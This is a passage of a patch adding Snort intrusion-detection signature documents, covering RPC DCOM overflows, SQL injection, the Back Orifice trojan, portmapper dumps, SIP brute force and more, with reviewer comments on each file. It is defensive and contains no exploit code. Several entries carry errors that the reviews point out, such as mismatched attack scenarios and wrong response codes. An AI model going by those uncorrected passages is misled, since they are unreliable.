+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PC_CookBook
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
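Review bot: "mosConfig_absolute_path" is the Mambo/Joomla configuration variable, so PC_CookBook is a Mambo/Joomla component and Affected Systems should name the host CMS, since that is where a defender would look for "pccookbook.php"; "All systems running CGI applications using PC_CookBook" tells them nothing. The credential-validation paragraph in Detailed Information does not apply to a file include, and Additional References is empty.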
--- /dev/null
+++ b/doc/signatures/1281.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1281
+
+--
+Summary:
+This event is generated when an attempt is made dump entries from the portmapper on a Solaris host.
+
+--
+Impact:
+Information disclosure.  This request can discover what Remote Procedure Call (RPC) services are offered and on what ports they listen. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts.  It can be queried for all RPC services running, the RPC program name and version, the protocol (TCP or UDP), and the port where the service listens.  This can provide an attacker with valuable information about which RPC services are offered and on which ports.
+
+--
+Affected Systems:
+All hosts running portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover RPC services and their associated listening ports. 
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Original rule modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS429
+
+
+--
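Review bot: Summary says "on a Solaris host" but Detailed Information and Affected Systems say all UNIX hosts running portmapper; pick one, and if the rule really is Solaris-specific say what in the request distinguishes it. The Summary also drops a word ("attempt is made to dump"). Corrective Action "Filter RPC ports at the firewall" should name portmapper's own port, 111 TCP and UDP, since that is where this dump request arrives, and should note that the RPC services portmapper registers listen on other, often dynamic, ports that filtering 111 alone does not cover.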
--- /dev/null
+++ b/doc/signatures/3198.txt
@@ -0,0 +1,84 @@
+Rule:
+
+--
+Sid:
+3198
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+This event indicates that an attempt to exploit this vulnerability via
+the ISystemActivator component has been made.
+
+This vulnerability is also exploited by the Billy/Blaster worm. The worm
+also uses the Trivial File Transfer Protocol (TFTP) to propagate. A 
+number of events generated by this rule may indicate worm activity.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists. This is also exploited by a worm.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Block access to port 69 used by the worm to propogate.
+
+Block access to port 4444 used by the worm.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Symantec:
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html
+
+--
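Review bot: Attack Scenarios ("a request for a file with an overly long filename via a network share") does not describe this vulnerability; Detailed Information says the trigger is a malformed DCOM activation request through the ISystemActivator interface, and that is what the scenario should say. Additional References cites only the Symantec Blaster writeup and should add the vendor bulletin MS03-026 and CVE-2003-0352 for the RPC DCOM flaw. Spelling: "Expoit" and "propogate".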
--- /dev/null
+++ b/doc/signatures/2759.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2759
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure create_snapshot_repgroup
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
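Review bot: the sentence "vulnerability in the procedure create_snapshot_repgroup / . This procedure is included in / dbms_repcat." is broken across lines with the period on its own line; it should read "vulnerability in the procedure create_snapshot_repgroup. This procedure is included in the dbms_repcat package." "Affected Systems: Oracle Oracle9i" repeats the vendor name and should list the specific releases the vendor alert covers, and Additional References is empty; add the alert the rule was written from so Corrective Action "Apply the appropriate vendor supplied patch" points at something.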
--- /dev/null
+++ b/doc/signatures/467.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+467
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a host running Nemesis v1.1 software.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a host running Nemesis v1.1 software contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+http://www.whitehats.com/info/IDS449
+
+--
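Review bot: Detailed Information says the echo request "contains a unique payload" but never says what the payload is, which is the one thing an analyst needs to verify the alert against a packet; document the payload bytes the rule matches. Corrective Action "Block inbound ICMP echo requests" is disproportionate for a reconnaissance signature and cuts off the legitimate troubleshooting noted under False Positives; rate limiting or logging at the border is the usual answer. Spelling: "legimately" should be "legitimately".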
--- /dev/null
+++ b/doc/signatures/3155.txt
@@ -0,0 +1,92 @@
+Rule:
+
+--
+Sid:
+3155
+
+--
+Summary:
+BackOrifice is a Trojan Horse.
+
+Server Port: 31337 although in later versions this port can be changed
+to a value between 1 and 65535 Protocol: UDP although in later versions
+TCP can also be used
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to. This Trojan
+also has the ability to delete data, steal passwords and disable the
+machine.
+
+--
+Detailed Information:
+The Trojan changes system registry settings to add the BackOrifice sever
+to programs normally started on boot. Due to the nature of this Trojan
+it is unlikely that the attacker's client IP address has been spoofed.
+
+The default name of the server application is UMGR32, which can be
+changed on first use. The new application may be installed in the system
+or system32 direcory and the original may also be deleted.
+
+--
+Affected Systems:
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
+
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
+
+Registry keys added may vary, look for spurious entries in the above
+locations.
+
+BackOrifice may hide the process from viewing inthe Windows task
+manager. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Symantec Security Response
+http://www.symantec.com/avcenter/venc/data/back.orifice2000.trojan.html
+
+--
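Review bot: the Summary does not say what the rule detects; it describes the Trojan's server port instead of the usual "This event is generated when..." statement, and the 31337/UDP default it gives is the original Back Orifice while the UMGR32 server name in Detailed Information and the Additional References link are Back Orifice 2000, so the doc should say which one SID 3155 matches (BO2K also runs on Windows NT/2000, which the Affected Systems list only half covers). Spelling: "sever", "direcory", "inthe".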
--- /dev/null
+++ b/doc/signatures/3408.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3408
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
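Review bot: this file is word for word the 3198 doc minus the worm paragraph, so it inherits the wrong Attack Scenarios (the "overly long filename via a network share" text belongs to a different vulnerability) and the missing MS03-026 / CVE-2003-0352 references; more importantly nothing here says how 3408 differs from 3198, which an analyst needs when both rules fire on the same traffic. State what each rule matches. Spelling: "Expoit".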
--- /dev/null
+++ b/doc/signatures/2337.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid: 
+2337
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Tellurian TftpdNT.
+
+--
+Impact:
+Execution of arbitrary code. Possible unauthorised root access.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of spurious
+activity in FTP traffic between hosts.
+
+It is possible for an attacker to expoit a buffer overrun condition in
+Tellurian TftpdNT. User supplied filenames are not correctly handled by
+some versions of Tellurian TftpdNT, this may result in an attacker being
+able to cause the overrun condition to occur.
+
+--
+Affected Systems:
+	Tellurian TftpdNT 2.0 and prior
+
+--
+Attack Scenarios:
+An attacker may use a publicly available exploit script to take
+advantage of the vulnerability.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+Disallow access to FTP resources from hosts external to the protected network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
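Review bot: Detailed Information and Corrective Action talk about FTP, but Tellurian TftpdNT is a TFTP server (UDP/69); "FTP is used to transfer files between hosts", "Disallow access to FTP resources" and "Use secure shell (ssh) to transfer files as a replacement for FTP" are copied from an FTP rule and should be rewritten for TFTP (filter UDP/69 at the perimeter, disable the service where it is not needed). Impact "Possible unauthorised root access" is wrong for a Windows NT product; state the Windows account the service runs under instead. Spelling: "expoit".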
--- /dev/null
+++ b/doc/signatures/100000532.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000532
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "BtitTracker" application running on a webserver. Access 
+to the file "torrents.php" with SQL commands being passed as the "order" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "order" parameter in the "torrents.php" script used by 
+the "BtitTracker" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BtitTracker
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
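Review bot: the "order" parameter of "torrents.php" is presumably a sort column interpolated into an ORDER BY clause, and Corrective Action should say so, because the usual fix of parameterised queries does not apply to identifiers; the application has to map the parameter onto a whitelist of column names. The credential-validation paragraph in Detailed Information is the CGI template and does not describe SQL injection; the two paragraphs before it already cover the actual flaw.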
--- /dev/null
+++ b/doc/signatures/2434.txt
@@ -0,0 +1,79 @@
+Rule:
+
+--
+Sid:
+2434
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Possible unauthorized administrative access to the server or application.
+Possible execution of arbitrary code of the attackers choosing.
+
+--
+Detailed Information:
+MDaemon is mail server software for Microsoft Windows systems. It uses a
+CGI web interface to send email. The email form used to submit the
+message does not properly check user supplied input. This may result in
+an attacker being able to supply a "From" field larger than 249 bytes
+which may in turn cause an error condition to occur in the executable
+file handling the form input. This error may present the attacker with
+the opportunity to gain administrative access to the server and also
+execute code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running on a web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	Alt-N MDaemon 6.5.2
+	Alt-N MDaemon 6.7.5, 6.7.9
+	Alt-N MDaemon 6.8.0 through 6.8.5
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
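Review bot: Summary should name MDaemon and its web mail form rather than "a CGI web application", and Attack Scenarios should describe the actual attack (a form submission with a "From" value longer than 249 bytes, per Detailed Information) instead of the generic "supply his/her own credentials" template. Additional References is empty although Affected Systems lists exact versions, so an advisory exists; add it.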
--- /dev/null
+++ b/doc/signatures/2550.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2550
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow 
+associated with Winamp's processing of a .XM file module name.
+
+--
+Impact:
+A successful attack may permit a buffer overflow that allows the execution
+of arbitrary code at the privilege level of the user running Winamp.
+
+--
+Detailed Information:
+Winamp is a media file player for Windows developed by Nullsoft.  A buffer
+overflow exists because of insufficient bounds checking while parsing fields
+in a .XM file.  An overly long module name may cause the buffer overflow 
+permitting the execution of arbitrary code at the privilege level of the user 
+running Winamp.
+
+--
+Affected Systems:
+Winamp 2.x, 3.x, and 5.0-5.02
+
+--
+Attack Scenarios:
+An attacker can create and send a malformed .XM tracker name that may cause
+a buffer overflow and the subsequent execution of arbitrary code on the
+vulnerable host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+
+--
+Additional References
+
+Other:
+http://www.nextgenss.com/advisories/winampheap.txt
+
+--
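Review bot: the Summary and "Detailed Information" place the overflow in the ".XM file module name", but "Attack Scenarios" calls it "a malformed .XM tracker name"; use one term so the reader knows which field the rule matches. Also the "Additional References" header is missing the trailing colon that every other file in this patch uses, so anything that splits the document on "Additional References:" will miss the nextgenss.com link below it.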
--- /dev/null
+++ b/doc/signatures/1550.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1550
+
+--
+Summary:
+This event is generated when an external attacker attempts to exploit a
+buffer overflow vulnerability in the ETRN command in NetWin DMail.
+
+--
+Impact:
+Severe. Remote execution of arbitrary code, leading to remote root compromise. 
+
+--
+Detailed Information:
+Some versions of NetWin DMail SMTP server contain a buffer overflow
+vulnerability in the ETRN command. An attacker can use an overly long
+string in an ETRN argument to cause a buffer overflow condition. This
+allows the attacker to crash the mail server or execute arbitrary code
+with root access. 
+
+--
+Affected Systems:
+	NetWin DMail 2.8a-h and prior
+	NetWin DMail 2.7q and prior
+
+--
+Attack Scenarios:
+An attacker sends an ETRN command with an overly long argument to a
+NetWin DMail SMTP server. The attacker can then crash the mail server or
+execute arbitrary code with root access. 
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+--
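Review bot: the two "Affected Systems" entries "NetWin DMail 2.8a-h and prior" and "NetWin DMail 2.7q and prior" overlap (2.7q and prior is already inside 2.8a-h and prior); state the single highest vulnerable version, or say why two ranges are listed. "Additional References:" is empty although "Ease of Attack" says "Exploits exist."; cite the advisory. The two "Corrective Action" lines lack terminal periods.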
--- /dev/null
+++ b/doc/signatures/2181.txt
@@ -0,0 +1,76 @@
+Rule:  
+
+--
+Sid:
+
+2181
+
+--
+Summary:
+This event is generated when a BitTorrent client transfers data with 
+another BitTorrent peer.
+
+--
+Impact:
+
+Possible violation of policy and abuse of network resources.
+
+--
+Detailed Information:
+BitTorrent is a peer-to-peer application used for simultaneous downloads
+of large files.  BitTorrent is designed to allow multiple peers to 
+download large files simultaneously without using extraneous bandwidth 
+from a centralized server.
+
+BitTorrent peers connect to other peers for file transfer.  This rule 
+looks for the BitTorrent protocol header on the default BitTorrent 
+ports.
+
+--
+Attack Scenarios:
+A user downloaded a BitTorrent client and attempts to download files 
+from a BitTorrent network.
+
+--
+Ease of Attack:
+
+Unix, Windows, and MacOS clients are publicly available for BitTorrent.
+
+--
+False Positives:
+
+None Known.
+
+--
+False Negatives:
+
+The protocol name is hard coded in BitTorrent to "BitTorrent Protocol".
+If the protocol name was changed in the clients and tracker, then this
+rule would not generate an event.
+
+The minimum and maximum ports for BitTorrent clients to listen on are 
+hard coded in the clients.  If the minimum and maximum ports were 
+changed in the clients, then this rule would not generate an event.
+
+--
+Corrective Action:
+
+If this is a violation of network policy, take appropriate steps to 
+prevent further violations.
+
+--
+Contributors:
+
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+
+-- 
+Additional References:
+
+Bittorrent Protocol Specification
+http://bitconjurer.org/BitTorrent/protocol.html
+
+Wikipedia
+http://en.wikipedia.org/wiki/BitTorrent
+
+--
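Review bot: this file has no "Affected Systems:" section, unlike every other signature document in the patch; add one (the "Ease of Attack" text already names "Unix, Windows, and MacOS clients"). The "Attack Scenarios" sentence mixes tenses ("A user downloaded a BitTorrent client and attempts to download"); "Rule:  " and the "-- " separator carry trailing whitespace, and there is an extra blank line between "Sid:" and "2181" that the other files do not have.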
--- /dev/null
+++ b/doc/signatures/100000163.txt
@@ -0,0 +1,60 @@
+Rule: 
+
+--
+Sid: 
+100000163
+
+-- 
+Summary: 
+This event is generated when an abnormally larger number of 407 Proxy 
+Authentication Required messages are returned by an SIP-enabled host.
+
+--
+Impact:
+This can be an indication of either a brute force authentication attack or a 
+denial of service in progress.
+
+--
+Detailed Information:
+When a user attempts to send an INVITE message with invalid credentials, a SIP 
+server returns a 401 Proxy Authentication Required message. A high volume of 
+these may indicate that an authentication attack, likely brute-force style, or 
+a denial of service is in progress.
+
+--
+Affected Systems:
+Any which implement the SIP protocol.
+
+--
+Attack Scenarios:
+An attacker could use a script to attempt a brute-force authentication attack 
+or a denial of service.
+
+--
+Ease of Attack:
+Simple, as it is easy to write a script to cycle through all possible 
+authentication values or to simply flood a system with unauthorized data.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use a firewall or other access-restriction device to block unwanted messages at 
+your network's border.
+
+--
+Contributors:
+Jiri Markl <jiri.markl@nextsoft.cz>
+Sourcefire Research Team
+
+--
+Additional References
+Other:
+
+--
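Review bot: the Summary says the rule counts "407 Proxy Authentication Required" responses, while "Detailed Information" says the server "returns a 401 Proxy Authentication Required message"; these cannot both be right, and the text must name the single SIP response code the rule actually matches, since a reader tuning the threshold will look for it. Also "an abnormally larger number" should be "an abnormally large number", "an SIP-enabled host" should be "a SIP-enabled host", and "Additional References" lacks its colon and carries an empty "Other:" entry.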
--- /dev/null
+++ b/doc/signatures/2040.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+2040
+
+--
+Summary:
+This event is generated when an attempt is made to login using XTACACS
+from a machine outside the local area network.
+
+--
+Impact:
+This may be an intelligence gathering activity or an attempt to access 
+resources controlled by the XTACACS server.
+
+This may also be an attempt to gain unauthorized access to resources 
+with the credentials of a valid user using brute force methodology.
+
+--
+Detailed Information:
+The Extended Terminal Access Controller Access Control System (XTACACS) 
+is an authentication and authorization protocol derived from  CISCO 
+TACACS. It is used in tcp/ip networks where network servers authenticate
+clients from a master server.
+
+When a user logs in to a server that uses XTACACS the server then makes 
+a request to a master server to detrmine the validity of the request. 
+The master server then verifies the login attempt and returns data 
+concerning that user which may include information regarding resources 
+the user is allowed access to in the form of an access list.
+
+--
+Affected Systems:
+All servers using XTACACS for authentication control.
+
+--
+Attack Scenarios:
+Regular user login method.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+XTACACS servers should only authenticate to known hosts and firewall 
+rules should prevent access to XTACACS enabled servers from outside the 
+local area network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-01.html
+
+Network Information Library - Intel:
+http://www.intel.com/support/si/library/bi0414.htm
+
+The Internet Next Generation Project:
+http://ing.ctit.utwente.nl/WU5/D5.1/Technology/xtacacs/
+
+--
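Review bot: the "False Positives:" section is empty (the "--" follows immediately), yet the Summary says the event fires on any XTACACS login "from a machine outside the local area network" and "Attack Scenarios" is "Regular user login method."; that combination means legitimate remote logins will trigger the rule, so the section should say so rather than be left blank. Typos: "detrmine" should be "determine", there is a double space in "derived from  CISCO", and "tcp/ip" should be "TCP/IP".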
--- /dev/null
+++ b/doc/signatures/3398.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3398
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
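Review bot: "Attack Scenarios" ("a request for a file with an overly long filename via a network share") does not describe the vulnerability given in "Detailed Information" (a "malformed request to an RPC port" overflowing a buffer in DCOM); the scenario text looks carried over from a different signature and should describe a malformed RPC DCOM request. "Additional References:" is empty for a vulnerability that has a vendor advisory; add it. Typo: "Expoit code exists." should be "Exploit code exists."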
--- /dev/null
+++ b/doc/signatures/100000844.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000844
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Koobi Pro" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "showtopic" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "showtopic" parameter in the "index.php" script used by the "Koobi Pro" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Koobi Pro
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
